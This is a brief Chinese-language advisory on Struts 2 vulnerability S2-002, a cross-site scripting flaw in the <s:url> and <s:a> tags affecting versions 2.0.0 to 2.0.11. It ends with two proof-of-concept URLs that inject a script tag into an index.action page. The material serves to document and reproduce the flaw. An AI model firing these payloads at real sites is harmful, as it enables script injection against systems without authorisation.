（CVE-xxxx-xxxx）s2-002
=======================

一、漏洞简介
------------

    对于<s：url>和<s：a>标签，可以在构造和呈现标签的结果URL时注入不能正确转义的参数值。以下情况是已知的：
    构造<s：a>结果中包含的参数值可以注入未转义的双引号，从而可以通过转义已渲染的href属性来在生成的HTML中注入代码。
    当includeParams设置为“none”的任何其他值时，<s：url>和<s：a>标签无法转义<script>标签，可以通过使用GET参数调用包含JSP /动作来利用

二、漏洞影响
------------

Struts 2.0.0 - Struts 2.0.11

三、复现过程
------------

### poc

    http://www.0-sec.org:8080/index.action?"><script>alert(1)</script><"
    http://www.0-sec.org:8080/index.action?<script>alert(1)</script>test=hello